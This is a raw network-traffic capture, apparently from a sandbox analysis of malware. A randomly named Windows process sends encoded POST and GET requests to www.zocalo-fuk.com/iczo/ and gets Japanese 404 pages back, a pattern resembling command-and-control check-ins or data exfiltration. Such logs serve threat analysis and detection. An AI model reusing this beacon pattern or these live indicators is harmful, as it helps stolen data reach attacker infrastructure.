Jul 27, 2024 08:06:23.619777918 CEST	1236	IN	Data Raw: 39 33 33 20 33 2e 32 38 31 2d 32 35 2e 38 35 39 20 39 2e 39 2d 32 2e 37 32 37 20 33 2e 31 35 32 2d 34 2e 37 36 36 20 36 2e 38 33 39 2d 35 2e 39 38 36 20 31 30 2e 38 32 34 2e 33 30 38 2d 34 2e 38 35 38 20 31 2e 39 35 35 2d 39 2e 35 33 36 20 34 2e Data Ascii: 933 3.281-25.859 9.9-2.727 3.152-4.766 6.839-5.986 10.824.308-4.858 1.955-9.536 4.759-13.515z"/><path fill="#fff" d="M23.693 42.593h-.4c-2.993.166-4.34 1.505-3.966 8.293-.007 2.101.415 4.181 1.238 6.114.696 1.315 2.18 2.009 3.635 1.7.646.041 1
Jul 27, 2024 08:06:23.619793892 CEST	1236	IN	Data Raw: 2e 30 38 38 2d 31 2e 37 32 31 2d 31 2e 30 35 34 2d 31 34 2e 34 2e 36 39 32 2d 32 38 2e 32 35 33 2d 33 2e 35 36 37 2d 33 33 2e 37 31 35 2d 31 30 2e 33 32 35 2d 2e 35 37 2d 2e 37 30 38 2d 31 2e 35 38 2d 2e 38 37 36 2d 32 2e 33 34 39 2d 2e 33 39 31 Data Ascii: .088-1.721-1.054-14.4.692-28.253-3.567-33.715-10.325-.57-.708-1.58-.876-2.349-.391-6.87 4.196-11.795 10.946-13.693 18.769-.787-.194-1.6-.266-2.409-.211-8.006.467-7.482 8.624-7.333 12.04-.001 2.658.581 5.283 1.706 7.691 1.247 2.296 3.706 3.668
Jul 27, 2024 08:06:23.619811058 CEST	1236	IN	Data Raw: 32 2d 31 2e 32 38 37 20 36 2e 30 39 35 2d 2e 37 31 38 20 31 2e 32 38 39 2d 32 2e 31 39 35 20 31 2e 39 35 36 2d 33 2e 36 33 36 20 31 2e 36 34 31 2d 2e 36 34 37 2e 30 33 37 2d 31 2e 32 38 36 2d 2e 31 36 31 2d 31 2e 38 2d 2e 35 35 37 76 2d 2e 30 37 Data Ascii: 2-1.287 6.095-.718 1.289-2.195 1.956-3.636 1.641-.647.037-1.286-.161-1.8-.557v-.075c1.028-3.526 1.556-7.178 1.571-10.851.003-1.479-.08-2.956-.25-4.425.355-.125.731-.181 1.107-.166h.449c1.474-.126 2.856.731 3.4 2.107.57 2.025.722 4.145.446 6.23
Jul 27, 2024 08:06:23.619827032 CEST	1236	IN	Data Raw: 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 35 36 2e 33 39 20 36 34 2e 39 37 33 6c 2d 34 2e 31 31 35 20 31 2e 34 36 2d 34 2e 31 31 35 2d 31 2e 35 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64 3d Data Ascii: "/><path fill="#fff" d="M56.39 64.973l-4.115 1.46-4.115-1.5"/><path fill="#f60" d="M52.26 68.239c-.209.001-.417-.035-.614-.105l-4.115-1.5c-.917-.361-1.38-1.387-1.043-2.313.337-.926 1.351-1.416 2.285-1.103l3.5 1.279 3.517-1.279c.613-.251 1.314-
Jul 27, 2024 08:06:23.619843960 CEST	1236	IN	Data Raw: 31 34 2d 2e 33 36 35 2d 2e 34 33 31 2d 2e 37 34 38 63 2d 31 2e 32 39 39 2d 32 2e 33 36 37 2d 32 2e 34 31 36 2d 34 2e 38 33 2d 33 2e 33 34 32 2d 37 2e 33 36 36 2d 31 2e 38 37 36 2d 35 2e 32 34 32 2d 33 2e 31 33 33 2d 31 30 2e 36 38 36 2d 33 2e 37 Data Ascii: 14-.365-.431-.748c-1.299-2.367-2.416-4.83-3.342-7.366-1.876-5.242-3.133-10.686-3.746-16.22l1.927-.47 2.274 5.9c.088.224.271.396.5.47l.241.038c.153 0 .302-.044.43-.128l10.472-6.891 3.85-2.511 3.917 2.608 10.428 6.984c.129.086.281.133.437.133l.2
Jul 27, 2024 08:06:23.624742031 CEST	1236	IN	Data Raw: 39 31 2e 35 33 37 2e 36 35 33 20 31 2e 34 35 35 20 31 2e 34 2e 35 35 39 2e 35 34 37 20 37 2e 34 31 37 20 37 2e 31 38 37 2d 33 2e 32 38 39 20 32 2e 31 36 2d 39 2e 38 38 32 20 36 2e 34 35 38 2d 35 2e 31 32 35 2d 31 33 2e 33 30 38 7a 6d 32 34 2e 32 Data Ascii: 91.537.653 1.455 1.4.559.547 7.417 7.187-3.289 2.16-9.882 6.458-5.125-13.308zm24.211 6.956l-3.376-2.242 10.084-9.6.681.234.254.12 7.7 3.854-.443 1-5.185 13.111-9.715-6.477zm7.749 35.878c.152.157.235.367.232.585v8.083h18.019v-26.078c-.006-.325.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	62391	157.7.107.37	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:06:25.431649923 CEST	1787	OUT	POST /iczo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Cache-Control: no-cache Connection: close Host: www.zocalo-fuk.com Origin: http://www.zocalo-fuk.com Referer: http://www.zocalo-fuk.com/iczo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 45 61 54 44 75 76 75 4d 77 55 42 4a 79 32 70 6b 7a 41 47 51 6d 6e 52 45 73 45 48 46 4f 49 33 7a 67 68 58 53 36 67 35 6d 50 76 45 43 68 76 63 63 67 74 62 30 77 71 57 64 37 53 68 39 47 4c 32 36 35 72 67 38 4c 76 30 74 7a 79 45 5a 74 41 72 43 52 50 69 6c 4f 4d 52 65 38 6f 4f 51 72 68 66 33 50 72 2b 75 30 75 56 61 46 52 31 59 37 35 50 4c 75 75 69 38 75 49 58 2f 63 56 30 6d 6b 4a 57 68 51 4e 54 72 79 41 48 68 52 4d 65 43 78 67 4c 4b 76 66 6b 61 2f 4c 79 49 63 4f 54 50 4b 38 2b 4a 47 34 6b 67 39 63 42 70 42 35 55 4d 75 30 74 6e 72 73 52 70 74 59 4e 69 52 32 33 33 74 6f 76 66 66 70 45 35 65 32 44 36 66 2f 4d 30 4f 62 6f 5a 66 75 73 76 55 44 59 6b 69 32 33 57 52 4b 6b 74 5a 78 47 35 68 52 69 71 54 4b 67 35 6c 6e 78 33 59 44 59 74 39 36 36 64 4c 47 37 2f 72 4b 34 67 51 56 64 61 2b 66 47 5a 63 39 79 34 6d 67 6d 78 57 4d 4b 66 69 74 70 56 73 79 72 56 75 5a 66 74 6d 50 36 67 5a 76 4c 46 48 4a 61 65 77 79 2b 52 52 67 43 6e 75 4c 44 44 72 67 69 36 64 76 6c 79 6a 2f 6d 51 74 4d 64 4f 6b 70 74 50 68 [TRUNCATED] Data Ascii: 9Fjx=EaTDuvuMwUBJy2pkzAGQmnREsEHFOI3zghXS6g5mPvEChvccgtb0wqWd7Sh9GL265rg8Lv0tzyEZtArCRPilOMRe8oOQrhf3Pr+u0uVaFR1Y75PLuui8uIX/cV0mkJWhQNTryAHhRMeCxgLKvfka/LyIcOTPK8+JG4kg9cBpB5UMu0tnrsRptYNiR233tovffpE5e2D6f/M0OboZfusvUDYki23WRKktZxG5hRiqTKg5lnx3YDYt966dLG7/rK4gQVda+fGZc9y4mgmxWMKfitpVsyrVuZftmP6gZvLFHJaewy+RRgCnuLDDrgi6dvlyj/mQtMdOkptPhHmlUree9c8fYzu4la86CMbFRToxrygXtzdNzJCMND3+Mkeo6NNG6/4FYhvZvgodv2OSypjMbM2kumTC9pldl1QyPdxphU4hv6uL/K1YudnqF0aoFPJOyiIN8ui+5+JPrGf+j80W0Wi1UKoYxXbQppSFeUUvW/x43+wh9XbIaU3HvHvUw8rr9eghlSF6lcG/CVqIZI4zIUTySTlVRC+5/ztJoD/loEZFsRuaAJvxgVYAS9ALu23eMm6bE9vlHtEi5XnLSP+JG+/9miwLBhK+KCGWShSnRaVAbVGs3+QT/55DAI2NP6xHLraUCu9bE0xVorCulE5D8yvM7bQdHshHJLi9A9TqSXJujivfCxfxL8tZId55688+h+WmEgX3q3VPk7XlqiDTPFNMwWd+5OQ9Ji1tjLmP6jpDXK19/YF/9WlTLpJ+DCdP/UHCngJhNSpv60/cS3g8rtZbXhFhtgn/6un1WpJ1Mk+UrkMnUnbOxdeScFieazXu5hvNsVCLmsbRWGlCP3hvf3UX3ERDfn2qcPOsjHe2LHoMv8f8jB7aexGoDe4PN6rpdkDQP+dtoGLeV3u8Mo0fDy3dlYi4tDq2odsY9/PZKvCCI1orKPqRNdNH92j0j6aBvtdXRXujkBy5dZE3RNPOuId3zROLHPTDfMPp/KR6CD8TI9p [TRUNCATED]
Jul 27, 2024 08:06:26.212132931 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 06:06:26 GMT Content-Type: text/html Content-Length: 19268 Connection: close Server: Apache Last-Modified: Fri, 27 Oct 2023 06:26:05 GMT Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
Jul 27, 2024 08:06:26.212173939 CEST	231	IN	Data Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -m
Jul 27, 2024 08:06:26.212198019 CEST	1236	IN	Data Raw: 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 Data Ascii: s-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap; flex-wr
Jul 27, 2024 08:06:26.212219954 CEST	1236	IN	Data Raw: 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72 64 65 72 3a 20 31 3b Data Ascii: e; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute; z-index: 1;
Jul 27, 2024 08:06:26.212235928 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 35 70 78 Data Ascii: .lol-error-page__ad-banner { text-align:center; margin: 15px auto 20px; } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; } @media screen a
Jul 27, 2024 08:06:26.212249041 CEST	1236	IN	Data Raw: 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 22 20 68 65 69 67 68 74 3d 22 31 34 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 35 20 31 34 38 22 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 Data Ascii: /svg" width="100" height="142" viewBox="0 0 105 148"><g fill="none"><path fill="#f60" d="M87.7 52.376c-.742-3.291-1.243-6.631-1.5-9.994.943-3.251 4.968-18.858-3.232-30.342-5.627-7.931-15.639-12.04-29.9-12.04h-.329c-14.1 0-24.317 3.988-30.153 1
Jul 27, 2024 08:06:26.212258101 CEST	848	IN	Data Raw: 36 20 31 2e 31 35 33 2e 35 39 34 20 31 2e 38 2e 35 35 37 20 31 2e 34 34 31 2e 33 31 35 20 32 2e 39 31 38 2d 2e 33 35 32 20 33 2e 36 33 36 2d 31 2e 36 34 31 2e 38 35 31 2d 31 2e 39 34 31 20 31 2e 32 39 33 2d 34 2e 30 33 37 20 31 2e 33 2d 36 2e 31 Data Ascii: 6 1.153.594 1.8.557 1.441.315 2.918-.352 3.636-1.641.851-1.941 1.293-4.037 1.3-6.156.258-2.084.09-4.199-.494-6.216-.544-1.376-1.926-2.233-3.4-2.107l-.402-.015z"/><path fill="#f60" d="M51.976 102.7c-.463 0-.908-.179-1.242-.5l-11.044-10.527c-.40
Jul 27, 2024 08:06:26.212272882 CEST	1236	IN	Data Raw: 30 34 2d 2e 30 30 31 20 32 2e 36 35 38 2e 35 38 31 20 35 2e 32 38 33 20 31 2e 37 30 36 20 37 2e 36 39 31 20 31 2e 32 34 37 20 32 2e 32 39 36 20 33 2e 37 30 36 20 33 2e 36 36 38 20 36 2e 33 31 35 20 33 2e 35 32 32 68 2e 36 34 33 63 2e 39 37 39 2d Data Ascii: 04-.001 2.658.581 5.283 1.706 7.691 1.247 2.296 3.706 3.668 6.315 3.522h.643c.979-.032 1.941-.261 2.829-.673 4.489 11.438 14.1 19.566 24.976 19.566h.209c10.834 0 20.486-8.037 25.051-19.415.881.422 1.837.662 2.813.707h.733c2.576.142 5.006-1.201
Jul 27, 2024 08:06:26.212286949 CEST	1236	IN	Data Raw: 39 63 31 2e 34 37 34 2d 2e 31 32 36 20 32 2e 38 35 36 2e 37 33 31 20 33 2e 34 20 32 2e 31 30 37 2e 35 37 20 32 2e 30 32 35 2e 37 32 32 20 34 2e 31 34 35 2e 34 34 36 20 36 2e 32 33 31 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 Data Ascii: 9c1.474-.126 2.856.731 3.4 2.107.57 2.025.722 4.145.446 6.231z"/><path fill="#fff" d="M39.765 24.186c-7.462 5.259-11.816 13.887-11.613 23.014 0 16.42 10.954 30.357 24.063 30.4h.15c13.079 0 24.183-13.8 24.242-30.191.013-4.387-.836-8.734-2.5-12.
Jul 27, 2024 08:06:26.212301970 CEST	1236	IN	Data Raw: 33 35 31 2d 31 2e 34 31 36 20 32 2e 32 38 35 2d 31 2e 31 30 33 6c 33 2e 35 20 31 2e 32 37 39 20 33 2e 35 31 37 2d 31 2e 32 37 39 63 2e 36 31 33 2d 2e 32 35 31 20 31 2e 33 31 34 2d 2e 31 34 32 20 31 2e 38 32 32 2e 32 38 32 2e 35 31 2e 34 32 35 2e Data Ascii: 351-1.416 2.285-1.103l3.5 1.279 3.517-1.279c.613-.251 1.314-.142 1.822.282.51.425.746 1.095.616 1.746s-.607 1.178-1.241 1.374l-4.115 1.5c-.195.075-.403.116-.612.119z"/><path fill="#FFEBE9" d="M52.29 58.908l-2.319-2.92s2.394-4.259 2.394-7.254"/
Jul 27, 2024 08:06:26.217238903 CEST	1236	IN	Data Raw: 35 2d 32 2e 35 31 31 20 33 2e 39 31 37 20 32 2e 36 30 38 20 31 30 2e 34 32 38 20 36 2e 39 38 34 63 2e 31 32 39 2e 30 38 36 2e 32 38 31 2e 31 33 33 2e 34 33 37 2e 31 33 33 6c 2e 32 34 38 2d 2e 30 33 34 63 2e 32 32 36 2d 2e 30 37 34 2e 34 30 37 2d Data Ascii: 5-2.511 3.917 2.608 10.428 6.984c.129.086.281.133.437.133l.248-.034c.226-.074.407-.245.493-.466l1.763-4.509 1.922.5c-.696 5.034-1.933 9.979-3.688 14.748-.952 2.538-2.094 5.001-3.417 7.367l-.4.681-.73 1.178c-.361.6-.739 1.153-1.093 1.657l-.208.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	62392	157.7.107.37	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:06:28.004748106 CEST	486	OUT	GET /iczo/?h20PB=Ilr0H&9Fjx=JY7jtaSJ5x5vzidknG2ksTpeyXyaG7X3ywH460gVL7Ewt7sZ57bb2J66wgBGIrGl5fwva+984CsI5kCUEaeHAKxito/MplmCBaK67oIqKDsPwPbc7aid6ru9XlM638WWQIDRvms= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.zocalo-fuk.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Jul 27, 2024 08:06:28.803503990 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 06:06:28 GMT Content-Type: text/html Content-Length: 19268 Connection: close Server: Apache Last-Modified: Fri, 27 Oct 2023 06:26:05 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
Jul 27, 2024 08:06:28.803524017 CEST	1236	IN	Data Raw: 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a Data Ascii: line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack: center; jus
Jul 27, 2024 08:06:28.803554058 CEST	1236	IN	Data Raw: 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 62 61 6c 6c 6f 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 32 30 70 78 3b 0a 20 20 20 20 20 20 Data Ascii: -page__information-balloon { width: 100%; max-width: 620px; position: relative; display: inline-block; height: auto; padding: 20px; vertical-align: middle; border-radius: 6px;
Jul 27, 2024 08:06:28.803566933 CEST	672	IN	Data Raw: 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 32 Data Ascii: 72; } .lol-error-page__ad { width: 100%; max-width: 620px; margin: 20px auto; } .lol-error-page__ad img { max-width: 468px; width: 100%; } .lol-error-page__ad-banner {
Jul 27, 2024 08:06:28.803579092 CEST	1236	IN	Data Raw: 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 Data Ascii: } @media screen and (min-width: 640px) { .lol-error-page__ad-banner-holizontal-right { margin-left: 20px; } } </style> <script type="text/javascript"> // function setCo
Jul 27, 2024 08:06:28.803591013 CEST	1236	IN	Data Raw: 31 34 2e 34 36 33 20 31 2e 37 31 36 2d 32 32 2e 34 35 35 7a 6d 2d 36 32 2e 32 37 31 2d 33 38 2e 33 33 34 63 35 2e 31 39 33 2d 36 2e 39 32 33 20 31 34 2e 33 38 31 2d 31 30 2e 34 33 20 32 37 2e 33 2d 31 30 2e 34 33 68 2e 33 31 34 63 31 32 2e 39 37 Data Ascii: 14.463 1.716-22.455zm-62.271-38.334c5.193-6.923 14.381-10.43 27.3-10.43h.314c12.974 0 22.058 3.582 26.936 10.535 2.787 4.183 4.285 9.091 4.31 14.117-4.045-13.545-15.289-21.356-31.774-21.431-11.253 0-19.933 3.281-25.859 9.9-2.727 3.152-4.766 6.
Jul 27, 2024 08:06:28.803602934 CEST	1236	IN	Data Raw: 20 38 39 2e 36 32 36 6c 39 2e 31 37 33 20 38 2e 38 20 39 2e 34 38 38 2d 38 2e 37 32 36 2d 32 2e 36 33 34 2d 32 31 2e 34 37 36 68 2d 31 33 2e 33 39 33 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64 3d 22 4d 38 38 2e 31 36 20 Data Ascii: 89.626l9.173 8.8 9.488-8.726-2.634-21.476h-13.393z"/><path fill="#f60" d="M88.16 43.646c-1.061-2.641-3.633-4.362-6.48-4.335-.793-.06-1.59.001-2.364.181-.533-2.534-1.341-5.002-2.409-7.36-.304-.67-.986-1.088-1.721-1.054-14.4.692-28.253-3.567-33
Jul 27, 2024 08:06:28.803615093 CEST	1236	IN	Data Raw: 2e 33 34 35 2d 2e 36 31 20 31 2e 37 38 34 2d 2e 38 35 34 20 33 2e 36 37 33 2d 2e 37 31 38 20 35 2e 35 35 34 20 30 20 2e 39 33 33 20 30 20 31 2e 39 32 36 2d 2e 30 37 35 20 33 2e 30 31 2d 2e 30 37 35 20 31 2e 30 38 34 2d 2e 31 39 35 20 32 2e 30 31 Data Ascii: .345-.61 1.784-.854 3.673-.718 5.554 0 .933 0 1.926-.075 3.01-.075 1.084-.195 2.017-.3 2.935-.282 1.589-.348 3.209-.195 4.816-3.73 11.227-12.574 19.384-22.555 19.384zm32.922-26.443c-.011 2.098-.449 4.172-1.287 6.095-.718 1.289-2.195 1.956-3.63
Jul 27, 2024 08:06:28.803627014 CEST	1236	IN	Data Raw: 37 2d 2e 35 35 37 2d 31 2e 30 39 2d 2e 38 37 34 2d 32 2e 35 36 38 2d 31 2e 30 38 37 2d 33 2e 38 36 31 2d 2e 35 35 37 2d 2e 39 31 39 2e 33 36 34 2d 31 2e 39 35 39 2d 2e 30 37 38 2d 32 2e 33 33 36 2d 2e 39 39 32 2d 2e 33 37 37 2d 2e 39 31 34 2e 30 Data Ascii: 7-.557-1.09-.874-2.568-1.087-3.861-.557-.919.364-1.959-.078-2.336-.992-.377-.914.051-1.96.959-2.349 2.653-1.123 5.719-.581 7.826 1.385.468.523.59 1.27.314 1.915-.276.645-.901 1.072-1.602 1.095l-.013.06z"/><path fill="#fff" d="M56.39 64.973l-4.
Jul 27, 2024 08:06:28.803638935 CEST	1236	IN	Data Raw: 33 22 20 64 3d 22 4d 34 36 2e 39 31 35 20 31 33 38 2e 38 6c 2d 2e 32 37 38 2d 2e 32 33 31 63 2d 2e 38 2d 2e 36 36 37 2d 31 2e 35 35 34 2d 31 2e 33 38 38 2d 32 2e 32 35 35 2d 32 2e 31 35 38 2d 2e 33 36 32 2d 2e 34 31 2d 2e 37 32 38 2d 2e 38 34 31 Data Ascii: 3" d="M46.915 138.8l-.278-.231c-.8-.667-1.554-1.388-2.255-2.158-.362-.41-.728-.841-1.1-1.286l-.372-.448-.111-.147c-.343-.459-.7-.934-1.037-1.433l-.158-.238c-.372-.537-.74-1.108-1.123-1.724l-.442-.736-.214-.365-.431-.748c-1.299-2.367-2.416-4.83
Jul 27, 2024 08:06:28.810015917 CEST	1236	IN	Data Raw: 20 31 2e 38 33 39 2e 34 35 36 20 32 2e 34 35 33 2e 36 39 32 2e 36 30 38 20 31 2e 37 31 32 2e 36 35 39 20 32 2e 34 36 31 2e 31 32 32 6c 2e 32 36 31 2d 2e 31 38 37 68 2e 30 30 38 63 2e 33 36 36 2d 2e 33 37 38 2e 35 37 2d 2e 38 38 32 2e 35 37 31 2d Data Ascii: 1.839.456 2.453.692.608 1.712.659 2.461.122l.261-.187h.008c.366-.378.57-.882.571-1.408.015-.539-.188-1.061-.564-1.448-.375-.387-.891-.606-1.43-.607v.001zm-19.426-13.156l-.334-.854 3.756-1.852 4.906-2.391.537.653 1.455 1.4.559.547 7.417 7.187-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	62393	203.161.50.128	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
